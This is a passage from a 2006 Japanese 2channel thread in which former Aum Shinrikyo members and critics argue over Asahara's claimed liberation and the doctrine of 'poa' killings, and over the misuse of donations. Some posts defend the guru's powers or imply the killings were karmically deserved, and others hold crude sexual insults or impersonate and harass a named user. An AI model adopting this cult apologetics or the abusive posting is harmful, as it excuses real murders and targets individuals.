電波を受け取っただけ。それを見て一人悦に入る電波君なんだよ。あなたは。




54 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/11(水) 14:45:28 ID:OAY3xraV
一般人を一つも論破できない解脱者なんてなぁ・・・

55 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/11(水) 14:49:45 ID:OAY3xraV
キャンディちゃん

もどきに聞いてみて。
教団にマーラが居なかったか。
人間の生命力を滋養にしている存在がいなかったか。

56 :名無しさん@3周年:2006/10/11(水) 14:50:15 ID:NEYLJdrJ
>>52
あなたもおかしい事を言うね。
ポアを確かめる以前にグルによってポアされるカルマが絶対的に存在
していることを忘れてはならない。
カルマゆえの結果であろうに。
君もグルのエネルギーがどれだけのものか知っているはずである。
今日は時間なので失礼するよ。


57 :名無しさん@3周年:2006/10/11(水) 14:53:13 ID:y4YFn4SC
聞いた話しではマンジュシュリ−さんはポアに失敗して
地獄に落ちたそうです。
ボアと言っていれば、みんな許してくれるわ−、ニッへ−
と言っているとしか聞こえません。

58 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/11(水) 14:57:15 ID:OAY3xraV
>>56
>あなたもおかしい事を言うね。
ポアを確かめる以前にグルによってポアされるカルマが絶対的に存在
していることを忘れてはならない。


それってやはり生殺与奪は我にありってことじゃん。
最初からその人を殺す権利が自分にはある、って言ってる。
だったらまずそれを証明せよ。
なんの説明もなく証明もなくそれを行うならそれはただの快楽殺人者と変わりはない。

>カルマゆえの結果であろうに。
君もグルのエネルギーがどれだけのものか知っているはずである。


そのエネルギーなど無かった。
だからこう反論している。
サマディにさえ入れなかったのだからそのエネルギーなど無い。

>今日は時間なので失礼するよ。

あまりこんなこと言いたくはないが・・・
論破できないので無視ですかい?
負け犬さん。

59 :名無しさん@3周年:2006/10/11(水) 14:58:42 ID:v1BwmvNa
57
教団の書物ではマンジュシュリが人間界に執着しているのを
教組が、苦労して人間界は執着と妥協によって成り立っている低い世界なのだと
いい聞かせて天界につれていったそうですが
バルドで教組のお世話になりました、と村井が言いに来たわけじゃないので
まったくの作り話といっても、誰にも反論はできません

あれじゃないですか、私は過去に妻が1000人と言って
今生ダキニ作るのを正当化してましたけど、その程度の思い付きでは
もちろん、過去に妻が1000人いたかもしれませんが
確めようがございませんわ

60 :名無しさん@3周年:2006/10/11(水) 15:03:52 ID:v1BwmvNa
その人はいつも、時間がないので失礼するよといっていなくなるのです

まあ、証明もできないことをもてあそんでいれば、オマンマ食える商売ってのも
あるんですよね
そんなところに、貢いだ自分がバカであったと、
あんまりな結果にあきれていますよ
ただもう、殺された人もいるのだ、自分はまだ生きていると
まるで(不謹慎な言い方ですみませんが)江戸時代のエタ非人みたいに
自分より不幸な人を見ては、まだましかと、納得するくらいしかできませんわ

61 :名無しさん@3周年:2006/10/11(水) 15:06:33 ID:v1BwmvNa
このバカ教団に、殺された人もいるってことですよ
キチガイの犠牲になって、、無念でしょうね
あの発言を、被害者の方がみたら
ハラワタ千切れてしまうでしょうよ

そういや、サエコってのもいたっけ、どうしてます


62 :名無しさん@3周年:2006/10/11(水) 15:14:10 ID:v1BwmvNa
支離滅裂でーも気にならない、ですからね
グルのエネルギがどれくらいか、知らないわけじゃございませんが
それがポアが成功した証明にならないのは、子供でもわかりますわ

つまり、教組のいったことの、ここまでは正しかった
だから、先もきっと、教組の言うとおりであろうと、類推の域にすぎないわけ
まあ、詭弁を弄して人を傷つけ
実際に殺してまで、お楽しみになっているのがよくわかりませんよ

信じすぎている、という事実をいったん、脇において
教組に実際、何ができて何ができないのか、わかる範疇で確めてご覧よ
思っているのの30分の一にもならないんじゃないか?



63 :名無しさん@3周年:2006/10/11(水) 15:21:39 ID:v1BwmvNa
第一あの、私の空が日本をおおった、って発言ありましたけど
あれって、何だったんですか?

あたかも、(実際にはできないことだが)空、という見えないものを使って
自分が日本の支配者になったとでも いわんばかりでしたが
バカじゃないの?
教組の空が日本をおおったのを見ましたか?
んで、どうなったってんです?
捕まって刑務所に入っているだけじゃありませんか

64 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/11(水) 15:27:52 ID:OAY3xraV
生殺与奪の権利がまるで自分たちにはあるように言う・・・・
何をしてもいいんだって言う・・・

ますますマーラの存在があるように思えるなあ・・・。

65 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/11(水) 15:29:14 ID:OAY3xraV
>>63

あれこそ妄想ってやつではないのかな。


66 :名無しさん@3周年:2006/10/11(水) 15:32:52 ID:v1BwmvNa
教組が最終解脱していないって、完全な証拠をご覧にいれるよ

教組が自ら私は最終解脱した、って公言したのは
神仙の会だったか、オウム初頭だよな?(正確な年数忘れたが
割と早い時期)

しかし、刑務所入ってから、獄中説法で、
(今、私の頭蓋には、一つだか、穴があき、最終的には三つあくだろう)と
てことは、そういった時点で、
(まだ私は修行の途中)って言ってしまったことになるな
これは誰にも反論できまい

教組がムショに入った時点で、まだ最終解脱はしていなかったと
教組のいうには、最終的に穴が三つ開くだろうと、(教組の考えている採取解脱が
それならば)、将来的にそうなると

しかし、自分で公言してしまったわけだ 過去にすでに最終解脱したといったのに
まだ、途中だと


67 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/11(水) 15:48:46 ID:OAY3xraV
>>66

それね、きっとこう言い訳するよ。
「最終解脱はしている。でも最終解脱の完成(完全最終解脱)はしていない。だから、
ムショでその修行をしている」
って。

解脱にいくつ段階つけるつもりだろ。麻原のおっさん。

68 :名無しさん@3周年:2006/10/11(水) 15:57:40 ID:v1BwmvNa
ハルマゲドンの時期だって、最初何年に来るっていったんだっけ?
こないとメーソンのせいで遅れているんですよと
本当にそう言ってたよ バーらナがな、、
2006年にこなけりゃ、10年にはくるとか、また延ばすんだろ?


69 :名無しさん@3周年:2006/10/11(水) 16:11:41 ID:XhZL/Lwu
どこで聞いたかわすれたけど、
麻原さんのは最終解脱仮認定候補だったって。

70 :名無しさん@3周年:2006/10/11(水) 16:16:37 ID:mBe/xg2q
>>53

アナルに肉棒突っ立てられる汚れが証智されるってことだな

71 :名無しさん@3周年:2006/10/11(水) 16:22:18 ID:8EueGOgQ
>>29
いいたいことは理解できる。
六神通を身につけて、
新しい教団を作って、
獅子吼してくれ。

私もそうする予定だが、
なかなか簡単に修行は進まないからね。

ある程度霊性の高い人が、
尊師のエネルギーを正しく認識できなくなるのは、
観念によってエネルギーを遮断しているからだろう。
しかし、そうなった人に、何が正しい観念であるか、
それを伝えることは難しい。
よって、最終的には神通力で、
強引に分からせるしかないような気がする。

72 :名無しさん@3周年:2006/10/11(水) 16:47:41 ID:a+lYvJY/
ゲイならオウムじゃなくてグル・サイババだろ

73 :名無しさん@3周年:2006/10/11(水) 16:56:05 ID:y4YFn4SC
オウムの元彼女ですが、
「あなたもソンシの神通力で思い知らされわよ。」
と言って、ソンシの力を信じているようでした。
サリンを撒かせるほどの、神通力があったようですが
私から見れば単なる豚にしかみえません。
神通力が使えると何をしてもいいとは思えません。
早く夢から覚めて欲しいです

74 :和井 恵:2006/10/11(水) 17:15:27 ID:58v8Jkwj
要するに、最近の北朝鮮の核実験によって、世界が不穏な空気に包まれている。
もしかしたら、これから戦争が起きるかも知れない、という可能性も出てきた。
こういう「状況」を背景にして、「ハルマゲトン」などという「戯言」を
再び言い始める者が現れたのだろう。

私は、仮にこれから戦争が始まったとしても、
「教祖の予言の成就」だなどとは決して思わない。

二度とそんな「妄想」に囚われるのはゴメンだね…

75 :名無しさん@3周年:2006/10/11(水) 17:25:47 ID:v1BwmvNa
同じ六神通を持っていても、釈迦は殺せなど言わないわけですが
六神通があったら殺していい、盗んで言い、犯していいと?


76 :名無しさん@3周年:2006/10/11(水) 17:34:23 ID:v1BwmvNa
公判記録では、一度に数冊読んだので、記憶が混乱しているかもしれんが
ロシアで射撃訓練を受けて帰ってきた数人に向かって
(君たちには死んでもらう、逃げたらポアする
家に逃げ帰ったら、家族ともポアする)と言ったそうだよ

なんで、こんな教団を、また復活させたいのかね?
気がしれんわ、、
あんたら、自分も死んでいいと思っているんだね、もちろん


77 :阿佐谷北本人:2006/10/11(水) 17:36:33 ID:Z9rcxE2K
 オウムの信者の中に犯罪を犯す恐れのある者が存在する、、、
オウムの幹部は近頃そう発表したらしいよ。

 こうした発言を重く見るべきじゃないのか?

 事件究明は真相には至っていない。幹部を再逮捕して、きちんと総括する時に来ているよ。
在家信者のほぼ全員が騙されてきた事実も、現在のオウム教団はうやむやにしてしまっている。

 裏切りOKの教団の教義を云々しても 無意味 だ。


78 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/11(水) 17:37:38 ID:OAY3xraV
>>70
>>72

ほい。
誰もそんなこと言って無いしねw
そういう卑劣な個人攻撃をしたヤツで、そいつ正しかったことが歴史上ただの一回でも正しかった
ことがあるかね?
ってことで君らは論破できないからただ単に人を傷つけて意見を封殺しようとしている幼稚で無智な野蛮人に過ぎない。


79 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/11(水) 17:39:47 ID:OAY3xraV
そういう卑劣な個人攻撃をしたヤツで、そいつ正しかったことが歴史上ただの一回でも正しかった
ことがあるかね?

変な日本語失礼

そういう卑劣な個人攻撃をしたヤツで、そいつ正しかったことが歴史上ただの一回でもあるかね?

へ訂正。

80 :阿佐谷北本人:2006/10/11(水) 17:39:50 ID:Z9rcxE2K
 宗教組織というものは、殺し合いや武装化にまで発展するケースが、
しばしば見られるモノらしいよ。

 内部抗争が発展して、そうなるケースがあるようだ。 

 そういうことは外国ではしばしばあるらしいんだよ。
それについて、これまで日本人は知らなさ過ぎたのではないか、、、。

 だが、外敵を作って、お茶を濁すやり方というのは、もう通用しまい。

81 :名無しさん@3周年:2006/10/11(水) 17:43:11 ID:v1BwmvNa
 >オウムの信者の中に犯罪を犯す恐れのある者が存在する、、、
オウムの幹部は近頃そう発表したらしいよ。

いつどこで?何を?

>よって、最終的には神通力で、
強引に分からせるしかないような気がする

私は別に、神通があるのを疑ってはいない
しかし、すぐに殺しを正当化したがるから、そういうものをきちっと
証明せよと言っている
なぜ、殺したがる?
別に、穏便な手段で修行してくれるなら、誰にも迷惑かけないなら
存続してくれてかまわないよ
食ってかかりたくなるのは、神通があるがゆえに、殺しも正当化されると
いいはるからさ
殺しを正当化したいがために、修行して六神通を証明したいのか?


82 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/11(水) 17:46:44 ID:OAY3xraV
>71
>ある程度霊性の高い人が、尊師のエネルギーを正しく認識できなくなるのは、
観念によってエネルギーを遮断しているからだろう。

却下。
解脱してないものの観念で遮断できるエネルギーってそんなの神聖なエネルギーではない。
真のリアリティは否定なんかできないはず。

>しかし、そうなった人に、何が正しい観念であるか、それを伝えることは難しい。

却下。
伝えるだけのものが無いとハッキリ言いなさい。
サマディ一つで済むことなのに。

>よって、最終的には神通力で、強引に分からせるしかないような気がする。

却下。
釈迦ムニでさえ強引にはしなかった。
そういう風に考えるのはやはりマーラが憑いてるんだと思う。
別に神通でねじ伏せなくともサマディ一つ示せばいいだけの話しだよ。

83 :名無しさん@3周年:2006/10/11(水) 17:55:15 ID:v1BwmvNa
どうしても殺人を正当化したい一方で、
ゴキブリにはエサをやりますからね

坂本さんを殺して、人相がわからなくなるように、ツルハシや石で
顔をつぶしたり、歯を折ってしまったそうなのに
ゴキブリにはエサをやりますからね
慈悲ってなんなのか、考えてしまうよ

84 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/11(水) 18:03:57 ID:OAY3xraV
つまり麻原や彼らにとっては人間の命の方が軽いんだよ。
ゴキブリよりもね。
事象がそれを現している。

85 :阿佐谷北本人:2006/10/11(水) 18:12:13 ID:Z9rcxE2K
>>81 いつどこで?何を?

いつどこで?何を?やらかしそうなのかは知らん。
だが、新団体報道、その近辺の幹部発言を調べてみなさい。

 かなりな恐れがあるんだろうと思うね、きっと。
警察へ救援依頼のサインを出しているのかも知れない。
裏部隊が勝手に動きだしたということなのかも知れないな。



86 :阿佐谷北本人:2006/10/11(水) 18:16:40 ID:Z9rcxE2K
>>81 神通があるがゆえに、殺しも正当化されるといいはるからさ

 神通と殺しの正当化とは結びつかない。
ことオウムにおいては、神通があるが故に殺しを行ったという事は無いはずだ。


 



87 :阿佐谷北本人:2006/10/11(水) 18:20:25 ID:Z9rcxE2K
 ともかく、教祖の死刑は確定した、、、、
その後懸念されるのは 暴動 だと言えるでしょう。

 オウムの信者の中に犯罪を犯す恐れのある者が存在する、、、
オウムの幹部は近頃そう発表したらしい。

 こうした発言を重く見るべきじゃないのか?

 事件は真相究明には至っていない。
元幹部を再逮捕して、きちんと事件を総括する時に来ているよ。時期を逸してはいけない。
在家信者のほぼ全員が騙されてきた、この事実も、現在のオウム教団はうやむやにしてしまっている。


88 :阿佐谷北本人:2006/10/11(水) 18:21:30 ID:XXevffDe
>>85-87

石田よ、こっちじゃ大笑いだよ。

【中年ニート】狂言師・阿佐谷北U【元オウマー】
http://that4.2ch.net/test/read.cgi/rmovie/1144737123
■お金を貰ってボランティアといえるか?
http://society3.2ch.net/test/read.cgi/volunteer/1101869424/l50
全てのボランティアは結局「自分のため」なの
か?
http://society3.2ch.net/test/read.cgi/volunteer/1074687427/l50
【スケ】池玲子【バン】
http://that4.2ch.net/test/read.cgi/rmovie/1092072027/
恐怖奇形人間    
http://that4.2ch.net/test/read.cgi/rmovie/1080454542/
◎岐阜市役所生活福祉課の横柄な対応◎
http://society3.2ch.net/test/read.cgi/mayor/1075728251/
【わくわくラジオ 】山田敦子アナ【ひるのいこい】
http://tv8.2ch.net/test/read.cgi/nhk/1100314881/l50
()()問題ありすぎNHKをチェック 2()()
http://tv8.2ch.net/test/read.cgi/nhk/1128602353/l100
NHK存亡の危機 受信料収入以外の増収方法
http://tv8.2ch.net/test/read.cgi/nhk/1127515515/l100
ハレークリシュナ について語ろう2
http://life7.2ch.net/test/read.cgi/psy/1142864230/l100



89 :阿佐谷北本人:2006/10/11(水) 18:28:54 ID:Z9rcxE2K
>>88 こっちじゃ大笑いだよ

名前を騙った上、笑って誤魔化すって奴か。笑

ーーーーーーーーーー

 事件は真相究明には至っていない。
元幹部を再逮捕して、きちんと事件を総括する時に来ているよ。時期を逸してはいけない。
在家信者のほぼ全員が騙されてきた事実も、現在のオウム教団はうやむやにしてしまっている。

 約束事を裏切ってもOKの教義を云々しても 無意味 なことだよ。








90 :阿佐谷北本人:2006/10/11(水) 18:32:06 ID:XXevffDe

-----------------------------------------------------------------------
投稿者 阿佐谷北(通院歴8年) 日時 1999年 9月 15日 00:52:41:

鬱病患者として、いわせてもらえば、全く失礼とは思いません。うつ病やSSRIをなんかかんちがいしてませんか。鬱であること、SSRIの常用をほこりとは思いませんが、恥であるとも思っていませんので。

-----------------------------------------------------------------------

91 :阿佐谷北本人:2006/10/11(水) 18:33:04 ID:XXevffDe
http://makimo.to/2ch/mentai_police/990/990188996.html
1 名前: 阿佐ヶ谷北 投稿日:2001/05/18(金) 21:29

近頃話題になっている、東京、千歳烏山のオウムマンションに陣取っている、警察官。
 特に、私服の人たちについて、知るところはありませんか。
6 名前: 阿佐ヶ谷北 投稿日:2001/05/18(金) 23:06

2 の投稿者へ
 1の文章が「わけわからん」とは.....

4 の投稿者へ
 お前呼ばわりは、警察官の常套句....とみた。傍を通るとき、いやな感じなんです。実際。

7 名前: 阿佐ヶ谷北 投稿日:2001/05/18(金) 23:09
白髪の男、見たことありませんか。
19 名前: 阿佐谷北 投稿日:2001/05/20(日) 13:54
はっきり言いましょう。
 ここでわたしの指摘している私服の警察官.....
 創価学会の関係者ではないか、と。
 違ってたら済みませんが....。
 住民の不安を考えれば、そこにいることは当然。私、なにも、警察を批判しているつもりもありませんので、誤解なきようお願いします。
 そのことで、ちと困ったことがありまして、掲示させてもらった次第です。

 追記 ネット上での、罵詈雑言止めて欲しいですね

92 :阿佐谷北本人:2006/10/11(水) 18:34:13 ID:XXevffDe
595 :名無しさんといっしょ :2006/07/03(月) 21:52:32 ID:DieSqmEH
不倫してるNHKアナウンサーをばらしちゃってもいい?

596 :阿佐谷北本人:2006/07/06(木) 19:32:42 ID:LBLieMWj
>>595 不倫

今では珍しくもないことになってしまったが、興味のある人は多いことでしょう。
現在のNHKという組織に終止符を打つ為には、それも良い事なのかもしれない。

 ここの組織、話題になるのは、番組よりも不祥事とゴシップばかりだ。


680 :阿佐谷北 本人:2006/07/08(土) 23:35:21 ID:Wi2Kac5/
>>595 不倫

その後の報告はどうなった?期待している読者もいることだろう

93 :阿佐谷北本人:2006/10/11(水) 18:34:49 ID:Z9rcxE2K
こんな連中ならば、既成の仏教教団で十分だったのではなかろうか。

 過去のオウムの教義に照らしてみても、
真言やインドの宗教(ヒンドゥー)、禅などは、まぁオウムサイドから認められていた宗教のようだ。
そうした既成の団体への不満から教団を立ち上げたこともまた事実だろう。

 キリスト教を擁護したり、予言を云々しているのならば、まったく教義無視、約束事破棄の
出鱈目である。

94 :阿佐谷北本人:2006/10/11(水) 18:35:05 ID:XXevffDe
551 :T関係者 :05/03/17 22:16:40 ID:Qbixh5eU
>>550
阿佐谷北=asagayakitaの正体ばれてるし相当やばいよ。
警察板見てないの?2ちゃん以外の某サイトに謝罪した?

552 :asagayakita :05/03/17 22:39:48 ID:TvW4h1AC
>>551 警察板見てないの?

 見ていないよ。
警察は直に俺に言ってくるから、その時言っている。
つまり、書き込む必要はないんだよ。



95 :阿佐谷北 本人は俺:2006/10/11(水) 18:36:15 ID:Z9rcxE2K
>>90-92

 HNを騙るのは止めてくれ。その引用は スレッド違いだ。

96 :阿佐谷北本人:2006/10/11(水) 18:37:39 ID:XXevffDe
マージャンの強い刑事さんいませんか?
1 名前: 阿佐谷北 投稿日: 01/11/18 21:52

 桜井章一さんと打ったことは
ありますか?

2 名前: バルボア ◆r6I7DQIM 投稿日: 01/11/18 23:09

申し訳ないが、非常に知能の低い感じのする者が立てた
スレという感じですね。

3 名前: 1 投稿日: 01/11/19 19:26

>>2
そうですか。申し訳ないですね。
 でも、言いがかりにしか聞こえませんね。

 知り合いにマージャンの強い方、多そうなのでね。

4 名前: 1 投稿日: 01/11/19 19:30

>>2
 それなら、わざわざ、返事を書き込んでいるあなたはなんですか

97 :死刑!!麻原さっさと死刑!!!!:2006/10/11(水) 19:22:45 ID:BXiQ+m2r
    /|
  / : !   _
_ノ   :└ ' ´  /
    } ー┼¨  /
    レ Cト   {__
           /
    ー/┐ヽ  〈
    / _/     ヽ
            /
|     つ     厶
}_   /  / ̄
   \ ・  /


98 :阿佐谷北本人:2006/10/11(水) 19:37:03 ID:Z9rcxE2K
>>94-96

騙り無用にしてくれ。

 こんな程度の連中ならば、既成の仏教教団で十分だったのではなかろうか。
 過去のオウムの教義に照らしてみると、
真言やインドの宗教(ヒンドゥー、ヨーガ)、禅などは、まぁオウムサイドから認められていた宗教のようだ。

 だが、そうした既成の団体への不満から、オウムは教団を立ち上げたこともまた事実なのだろう。
それならば、キリスト教を擁護したり、今も予言を云々しているのならば、それは論外の行為であり、
まったく教義無視の出鱈目であると断じる事が出来よう。

 したがって、ここの如き教義スレは、無意味な議論でしかないということだ。


99 :阿佐谷北本人:2006/10/11(水) 19:54:14 ID:Z9rcxE2K
事件は真相究明には至っていない。
元幹部を再逮捕して、きちんと事件を総括する時に来ているよ。時期を逸してはいけない。
在家信者のほぼ全員が騙されてきた事実も、現在のオウム教団はうやむやにしてしまっている。

 約束事を裏切っても澄ました顔でいる連中の教義を云々しても 無意味 なことだよ。




100 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/11(水) 20:21:46 ID:OAY3xraV
>>99

>約束事を裏切っても澄ました顔でいる連中の教義を云々しても 無意味 なことだよ。

そうは思わないよ。
彼らの間違いを明らかにすることによって洗脳から抜け出すことができる人が少しでもでてくれればいいのではないかな。
事件を明らかにすることによって抜け出す人もいるだろうけど、そうじゃない、未だに麻原や教義を信じてる人はその間違いを
きちんと解き明かさないと。


101 :名無しさん@3周年:2006/10/11(水) 20:37:41 ID:VcM7JnHY
 >オウムの信者の中に犯罪を犯す恐れのある者が存在する、、、
オウムの幹部は近頃そう発表したらしいよ。

どこを調べればいいんだろう??
みなさん、知っている?


102 :阿佐谷北本人:2006/10/11(水) 20:51:25 ID:Z9rcxE2K
>>100 彼らの間違いを明らかにすることによって

w笑。

 オウムの教義は、間違い ではない、間違いとは言えないんだよ。
それは裏切りなんだ。

 如何に立派な、完璧な教義であっても、実態が裏切りOkでは、
教義を議論することは 無意味 だ。

 キミも分かっていないな。
しつこくスレッドを長引かせる様な行為は、今も存続しているオウムとほぼ同罪だろう。

103 :阿佐谷北本人:2006/10/11(水) 20:54:10 ID:Z9rcxE2K
>>100 洗脳から抜け出すことができる人が少しでもでてくれればいいのではないかな


  オウムの教義は、間違い ではない、間違いとは言えないんだよ。
それは裏切りなんだ。

 如何に立派な、完璧な教義であっても、実態が裏切りOkでは、
教義を議論することは 無意味 だ。

 このことを真に理解しているなら、キミには別の意図があって書き込みを続けているとしか俺には思えない。

104 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/11(水) 20:57:06 ID:OAY3xraV
>>103

>オウムの教義は、間違い ではない、間違いとは言えないんだよ。それは裏切りなんだ。

間違ってないと?
俺は立派な教義でないと言ってる。

逆に君に別の意図があって書き込みを続けてるようにしか思えないけど?





105 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/11(水) 20:58:37 ID:OAY3xraV
>>103

どう裏切りなのか教えてくれる?

106 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/11(水) 21:11:36 ID:OAY3xraV
>>103
>オウムの教義は、間違い ではない、間違いとは言えないんだよ。

ついでにどう間違いではないのかも教えてくれないかな?

107 :阿佐谷北(本物) ◆Kcjlum1seI :2006/10/11(水) 21:19:47 ID:Ro91ucjv
>>85-99,>>102-103
皆様へお知らせ
「電波警報発令!」

無印の「阿佐谷北(イシダ)」が再び現れました。
この人はトリップ付きの本物である私とは全く別人の、偽者です。
私が十年以上使用して来た「阿佐谷北」というHNを勝手に盗用し、根拠不明の放言を繰り返している異常者なのです。
あまりに綺語・妄語のカルマを積みすぎて、最近では完全に狂ってしまったと聞きました。
上記のレスを見れば、それも一目瞭然かと思われます。
今後、このキャバクラ好きの変質者が現れてスレッドを荒らしましても、皆様におきましては完全スルーの方向でお願い致します。

シヴァの喜び氏、この無印:阿佐谷北(偽者)の電波を相手にしてもアストラルが汚れるだけですよ。

108 :名無しさん@3周年:2006/10/11(水) 21:21:30 ID:i3np2mMq
>>88 こっちじゃ大笑いだよ。
 
こっちでも成就者会議の内容が大笑いされてるんだけど。

109 :名無しさん@3周年:2006/10/11(水) 21:24:44 ID:VcM7JnHY
106 いいんだよ 北にはしゃべらせておけば、、
あの人は、ずっと以前にこのスレに常駐していた人なの

とにかく、もう他人の奴隷にされるのはうんざりですよ
それは、オウム流に言えばこうでしょう
人間に自由何かない、と
会社にいけば奴隷だと、あるいは情報社会の奴隷だと
しかし、オウムにいけば
バカガキどもの奴隷かね?
あたしは20のときに、自分の稼ぎを取られたよ
サマナはいいことしてやっているんだと、思っていたさ
貪りがあるんだから、布施するほうがいいと
あるいは功徳がつめると、、、ほーー
じゃあ、教組の実子は、徳の理論なんか信じていないんだな?
だって、人が徳を積みたいとおもって、教団に出した金を、
自分のためにつかっちまうじゃないか!!
徳の理論を信じていたら、他人が、真理のためにと差し出した金を
個人の(別に必要もない)ことのために、使い込むなんて
怖くてできないさ!!

全く、バカげている 宗教は金輪際ごめんだね
救ってやるの救済するのいって、自分らのことしか考えていねーーーぜ
人の人生を食い物にして、よく平気で、教組のガキドモのためにばかりは
計ってやる気になるよな?

あたしにだって、とうちゃんかあちゃんいるんだぜ?
あたしの両親にしてみれば、あたしが一番かわいいんだよ!!
あんたらは、教組の子供しか眼中ないかもしれませんがね、、、、
なんで、あたしがあんたらの奴隷にならないといけないんだよ?


110 :名無しさん@3周年:2006/10/11(水) 21:33:40 ID:VcM7JnHY
漏れは布施がしたくて、徳がつみたくて、今できる楽しみを
押さえて、節約して布施したさ
なんでもかんでも金もては、喜んで布施しにいったさ
そんでなんだよ?
バカファミリが使い込むのか?
働きもしないで、ヘタクソな絵の貸し出し料で月に40マンかよ??
人を馬鹿にするのもいい加減にしな?
えらいさんは違うねえ、おい?
一般の会社より、ひでえよ
完全に頭に来たからな
人をバカにしやがって、、私らがそうやって、あくせく働いて
けちけち節約して、布施した金なんだぜ?
何を思って、私立にやるだのマンション買うだのしているんだよ?
公立行かせろっていっているだろ?
バカがどうして私立なんか受けた?
わざわざ、金使ってやろうと思って、高いところ受けるんだぜ
本当に頭に着たからな!!


111 :阿佐谷北(本物) ◆Kcjlum1seI :2006/10/11(水) 21:40:04 ID:Ro91ucjv
ついでに横レス失礼
>>56
>それってやはり生殺与奪は我にありってことじゃん。
>最初からその人を殺す権利が自分にはある、って言ってる。
>だったらまずそれを証明せよ。
>なんの説明もなく証明もなくそれを行うならそれはただの快楽殺人者と変わりはない。
>
 外側だけしか見ないなら、確かに「快楽殺人者」にしか見えない罠w

>そのエネルギーなど無かった。
>だからこう反論している。
>サマディにさえ入れなかったのだからそのエネルギーなど無い。

 申し訳ないが、私は教祖のエネルギーを直接体験した事がある。
 「見た」「感じた」というレベルではなく、私の変化身か何かが直接教祖のエネルギーの中に入って体験した次第。
 それまでの私自身のイメージや観念を遥かに凌ぐあまりの凄まじさに驚いた物です。
 私は徹底的に否定的で且つエネルギーの下降傾向が極めて強いサマナでしたので、全く予期していない出来事にただ呆然とした物です。
 この体験以来、私は教祖と張り合おうという気は一切無くなりました。(もっとも、疑念を完全に克服するまでには到りませんでしたがw)

 「シヴァの喜び」氏は公開の場でのサマディを重要視していらっしゃいますが、それを頻繁に行っても所詮パイロット・ババ辺りのレベルでしょ?
 正直言って、教祖のエネルギーはそんな物とは比較にならないと思います。
 「シヴァの喜び」氏がそれを全く感じられなかったのは、幾ら教祖と縁が深くても、本当の意味で「教祖に意識が向いていなかった」からでは無いでしょうか?
 功徳が有るのに霊性がそれほど高くなかったのも、その原因かと思われますが。


112 :名無しさん@3周年:2006/10/11(水) 21:42:15 ID:VcM7JnHY
漏れは、ガキのころから英語を目指していたから
金がたまったら海外だって言ってみたいと思っていた
オウムに3,4百万布施したけど 一度も外国行ったことないんだ

なんでなら、何をしようとも諸行無常だって、吹き込まれたからさ!!
外国行こうが英語しゃべろうが、今生かぎりのことで
来世にもっていけるもんでないし、意味がないから、それより
稼いだ金をせっせと布施したほうが、自分のためになると、そう思ったのさ
もう時間がないだの、言われたしね、、

好きなことをしたいと、思う気持ちが、(もしそれができなければ)自分を
苦しめることになるから、あれが好きこれが嫌いの言わずに
今できることを淡々とせよと
それが、教えだった
しかし、今したいことをするために、人から取った金で
欲しいものをあっと言う間に手に入れる人もいますからね?
それが、幹部だっていうんですからね・
人には欲望を持つことの苦、だから欲を遮断せよ、と耳にタコができるくらい
教えておいて、自分らはなんですか?


それがこれだ?あんたら、人をなめるのもいい加減にしてよ?
完全に頭に来たからな
人の人生にはあれこれ口出しして、金まきあげて
まだ足らなくて大金はたいて贅沢していやがる
時間を返してくれ
これから好きなことをするから


113 :名無しさん@3周年:2006/10/11(水) 21:47:28 ID:VcM7JnHY
信者には
物質に拘泥すると物質レベルにとどまって霊性があがらないの
溜め込みたがるのは貪りだの
いろいろいって、できるだけ金取り上げようとしているのに
なんですか、
不動産の所有?ガンにでもなれば??


114 :名無しさん@3周年:2006/10/11(水) 21:52:10 ID:VcM7JnHY
自分の人生、自分の家族、じぶんのもの、、、そういう自我感覚が不幸をまねくと
それが、あんたらの教えるべきことなのに

自分の人生がうまくいくように、邪魔なものとは裁判しても戦う
自分の家族のために、他人を押しのけても計らう
この子たちは、霊性高いかしらないが、宗教書のひとつも読んだこと無いね?
センスないよ
自分の進学自分の将来、自分の人生、、
わたしらは、それを捨てろと教えられたんだ
そうやって自分自分と囚われるから、苦が去らないんだからと教えられてな、、
で、なんだよ
自分を捨てるために教団に自分で使わずに差し出したら
幹部が取って使っちゃうのかよ?え???



115 :名無しさん@3周年:2006/10/11(水) 21:54:24 ID:VcM7JnHY
何とか言ったらどうなんだ?
私は教団のホムペにメール入れたが
あいつらバカにしているのか、一度も返事をよこさないぜ?
なんのために、ご意見うかがいのホムペ作ったんだよ?



116 :名無しさん@3周年:2006/10/11(水) 22:01:41 ID:y4YFn4SC
渋谷にファイナルファンタジアというお店があるそうです。
日本では女子高生のウンコや尿、唾などが売り買いされて
いるそうです。ほんとファイナルです
人の価値観は自由ですが押し付けて欲しくありません。
彼女もオウムの中だけで生きて欲しいと思います

117 :名無しさん@3周年:2006/10/11(水) 22:05:35 ID:VcM7JnHY
漏れが20のときには、無理やり分割にしてやるからと
イニシエションの約束させられたよ
私は金があったら、自分に使いたいんだと思っていた
あんたらは、そんなことお構いなしさ すげーーところだったよ
そんで私は憤慨していたけど
あなたは、オウムと縁が深いとか、修行者だとか
いろいろ言われた
だからって、私の金取らないでよ?
だってよ?縁が誰より深い実子ですら、教団の金ぱっぱと使うんだモノ
縁の遠い私が何しようと、私の勝手でしょうよ?
口出ししないでよ

もう時間は戻らないから、せいぜいあんたらのやっていることに
口出しして、嫌がらせして、せめて取り返した気分にさせてもらうわよ

118 :阿佐谷北(本物) ◆Kcjlum1seI :2006/10/11(水) 22:10:59 ID:Ro91ucjv
>>109
>じゃあ、教組の実子は、徳の理論なんか信じていないんだな?
>だって、人が徳を積みたいとおもって、教団に出した金を、
>自分のためにつかっちまうじゃないか!!
>徳の理論を信じていたら、他人が、真理のためにと差し出した金を
>個人の(別に必要もない)ことのために、使い込むなんて
>怖くてできないさ!!

 御家族が問題なのは、現在は何ら救済活動に携わっていないのに教団から経済的援助を受け続けている点だな。
 それで功徳を減らし、ニートの元信者からでさえも非難を受けていると。

>>110
